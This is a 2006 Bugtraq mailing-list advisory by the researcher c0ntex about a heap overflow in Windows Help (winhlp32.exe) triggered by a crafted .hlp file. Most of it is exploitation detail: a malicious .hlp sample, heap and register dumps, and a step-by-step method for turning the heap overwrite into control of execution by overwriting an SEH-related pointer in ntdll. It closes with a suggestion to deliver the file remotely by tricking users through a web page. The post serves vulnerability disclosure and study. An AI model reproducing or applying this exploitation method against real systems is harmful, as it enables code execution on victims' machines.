[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060413153656.24945.qmail@securityfocus.com>
Date: 13 Apr 2006 15:36:56 -0000
From: c0ntexb@...il.com
To: bugtraq@...urityfocus.com
Subject: Windows Help Heap Overflow
/*
*****************************************************************************************************************
$ An open security advisory #15 - Windows Help Heap Overflow
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org
2: Bug Released: March 31st 2006
3: Bug Impact Rate: Undefined
4: Bug Scope Rate: Local / Remote in cases
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
*****************************************************************************************************************
Windows Help
www.microsoft.com
There is a heap based buffer overflow in the rendering engine of .hlp files in winhlp32.exe which will allow some
attacker the possibility of modifying the internal structure of the process with a means to execute arbitrary and
malicious code.
By modifying the value of an image embedded within a .hlp file, (tested with ? image and [] button images) it is
possible to trigger this bug and overflow a static buffer that is defined for data sections of the .hlp file. This
grants the attacker with the ability to perform an overwrite of block(n) and the following blocks control data.
I thought this was an april fools but it's a day too early :) Microsoft decide to reject this issue as Windows Help
is a scriptable environment and as such should not be trusted, as a malicious person could add this said "script"
to .hlp files which would execute "stuff" on the users system. Therefor I release this Heap Overflow as another
untrustable issue with this Microsoft product.
I met some Microsoft Security Auditor guys at Blackhat, Alex and some dude called Skylined --- sorry that I didnt
mention this bug or the one in hh.exe and t3h ebUl.chm, I was selling out to get IDefense bug bounty, but alas it
back fired. I could have done with $10000 but ho hum, you win some you loose some :-)
*/
// Example vulnerable section of a .hlp file ( I used acmsetup.hlp in this example) :
......snip .....
:CW(`main'):FH()
:CBB(`btn_topics
',`NS():JI(`>mai
n',`HelpTopicsBu
tton'):FH():CS()
:FH():FD()'):SPC
(16777215):FH().
.........lP.....
............. ..
.z...\..........
................
................
..w..x......x...
..5.`......%...e
% ....3.@.......
..x.......w..
// One with malicious input 'inserted' to trigger the bug:
......snip......
:CW(`main'):FH()
:CBB(`btn_topics
',`NS():JI(`>mai
n',`HelpTopicsBu
tton'):FH():CS()
:FH():FD()'):SPC
(16777215):FH().
.........lP.....
............. ..
.z...\..........
.........AAAAAAA
AAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA
plus 10,000 more
After winhlp32.exe opens the .hlp file, the heap state will be as follows:
HEAP[winhlp32.exe]: Heap block at 0009B940 modified at 0009B9A2 past requested size of 5a
0:000> dd 0009b940
0009b940 0005000f 001e0700 4f26001f 41697470
0009b950 41414141 abababab 41ababab feeefeee
0009b960 4100feee 41414141 00040000 41000005
0009b970 554d001b 41002928 41414141 feababab
0009b980 4100feee 00000000 41060000 41414141
0009b990 6f42001f 416d6b6f 65446b72 416e6966
0009b9a0 41414141 abababab 41ababab feeefeee
0009b9b0 4100feee 00004141 000f0006 feee0400
HEAP[winhlp32.exe]: Invalid Address specified to RtlFreeHeap( 00090000, 0009B948 )
(728.2f8): Break instruction exception - code 80000003 (first chance)
eax=0009b940 ebx=0009b940 ecx=77f75c17 edx=0007ecba esi=00090000 edi=0009b940
eip=77f75a58 esp=0007eec4 ebp=0007eed8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202
0:000> dd 0009B948
0009b948 4f26001f 41697470 41414141 abababab
0009b958 41ababab feeefeee 4100feee 41414141
0009b968 00040000 41000005 554d001b 41002928
0009b978 41414141 feababab 4100feee 00000000
0009b988 41060000 41414141 6f42001f 416d6b6f
0009b998 65446b72 416e6966 41414141 abababab
0009b9a8 41ababab feeefeee 4100feee 00004141
0009b9b8 000f0006 00230400 000901a8 000901a8
HEAP[winhlp32.exe]: Heap block at 0009BE50 modified at 0009BF54 past requested size of fc
0:000> dd 0009BE50
0009be50 00180023 001c0700 02390006 007a0000
0009be60 00000000 02b30000 00280000 000e0000
0009be70 000d0000 00010000 00000004 00000000
0009be80 00000000 005a0000 00100000 00000000
0009be90 00000000 00000000 80000080 80000000
0009bea0 00800080 00800000 80800080 41410000
0009beb0 41414141 41414141 41414141 41414141
0009bec0 41414141 41414141 41414141 41414141
Here we can see we have overwritten the end of the previous chunk at 0009be54 and over the control section of the
next following chunks
0:000> dd 0009BF54
0009bf54 41414141 41414141 41414141 41414141
0009bf64 41414141 41414141 41414141 41414141
0009bf74 41414141 41414141 41414141 41414141
0009bf84 41414141 41414141 41414141 41414141
0009bf94 41414141 41414141 41414141 41414141
0009bfa4 41414141 41414141 41414141 41414141
0009bfb4 41414141 41414141 41414141 41414141
0009bfc4 41414141 41414141 41414141 41414141
This situation provides a 4-byte arbitrary memory overwrite due to the fact that we directly control two pointers
in the heaps management structure:
EAX 41414141
ECX 41414141
EDX 0009E5D8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
EBX 00090000
ESP 0007F90C
EBP 0007FB30
ESI 0009E5D8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
EDI 00000068
EIP 77F581BD ntdll.77F581BD
"The instruction at "0x77f581bd" referenced memory at "0x41414141". The memory could not be "written"
(dc.cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=0000003f ecx=41414141 edx=0009bf68 esi=0009bf68 edi=00090000
eip=77f581bd esp=0007e684 ebp=0007e89c iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246
77f581bd 8901 mov [ecx],eax ds:0023:41414141=????????
> 77f581bd 8901 MOV DWORD PTR DS:[ECX],EAX
> 77f581bf 8948 04 MOV DWORD PTR DS:[EAX+4],ECX
Analysing the heap state afterwards, we can see we are able to modify the heap structures with user supplied input,
which will grant the attacker the possibility of overwriting 4 bytes of writable memory with user supplied values.
We can see that we have a classic heap overflow and can now either perform an overwrite of _VECTORED_EXCEPTION_NODE,
UnhandledExceptionFilter or RtlEnterCriticalSection amongst other locations, which will return us back to malicious
code and execute it for us. Another simple, useful option is to simply hijack the applications SE Handler directly
which will allow us to gain control of the process in the same manner.
* set ecx -> Top SE handler address
* set eax -> Set EAX to a pointer to our supplied input (0x0009E7B2)
...which will result in EIP being owned here after continuing:
EAX 00000000
ECX 0009E7B2
EDX 77FB1742 ntdll.77FB1742
EBX 00000000
ESP 0007E2B8
EBP 0007E2D8
ESI 00000000
EDI 00000000
EIP 0009E7B6 ---> what ever is here will be executed ( our supplied data is :) )
However, we are not going to do that, instead we are going to target a different stack pointer @ ntdll.77F51C48.
Running winhlp32.exe in Olly, we set the argument as the malicious.hlp file and run it, eventually it will die here:
77F8452D 8901 MOV DWORD PTR DS:[ECX],EAX
77F8452F 8948 04 MOV DWORD PTR DS:[EAX+4],ECX
And the registers will have the following setup after the crash:
EAX 74747474
ECX 74747474
EDX 0009BEB8 ASCII "tttttttttttttttttttttttttttttttAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
EBX 0000003F
ESP 0007E684
EBP 0007E89C
ESI 0009BEB8 ASCII "tttttttttttttttttttttttttttttttAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
EDI 00090000
EIP 77F8452D ntdll.77F8452D
Now, the stack location we are interested in looks like so at this point:
0007E88C 0007E910 Pointer to next SEH record
0007E890 77FA88F0 SE handler
0007E894 77F51C48 ntdll.77F51C48 <<------------- Our victim
We then set EAX (which is user controlled) to -4 the attacked location 0007E894, and when MOV [EAX+4],ECX happens, we
shall overwrite our target. We now set ECX to a pointer to our controllable input, a few bytes past all those t's to
get to our pot of honey:
EAX 0007E890
ECX 0009BED8 ASCII 41,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EDX 0009BEB8 ASCII "tttttttttttttttttttttttttttttttAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
EBX 0000003F
ESP 0007E684
EBP 0007E89C
ESI 0009BEB8 ASCII "tttttttttttttttttttttttttttttttAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
EDI 00090000
EIP 77F8452D ntdll.77F8452D
..we then continue the process and pass the exception to the application, which after dealing with we end up with our
registers looking like so:
EAX 0009BEB8
ECX 77F75C17 ntdll.77F75C17
EDX 0007E474
EBX 0003A390
ESP 0007E678
EBP 0007E89C
ESI 0009BEB8
EDI 00000000
EIP 77F75A59 ntdll.77F75A59
...and, our stack location where the victim is laying will be looking like so:
0007E88C 0007E910 Pointer to next SEH record
0007E890 77FA88F0 SE handler
0007E894 0009BED8 <<---------------- Here we go!
great, we have modified our victim pointer with our nasty address, which is now pointing in to our pot of honey!! We
then continue the process again and let the application deal with the exception, and after a second we have control of
our application:
EAX 0007E298
ECX 00000003
EDX 77FB1742 ntdll.77FB1742
EBX 0007E88C
ESP 0007E27C
EBP 0007E89C
ESI 00000001
EDI 0009BED8
EIP 41414141
It should be possible to perform this attack remotly by embedding the .hlp file into an HTML page and tricking a
user to click the link, granting remote access to the system with the permissions of the user who executed the help
file.
regards, c0ntex
http://www.open-security.org
Powered by blists - more mailing lists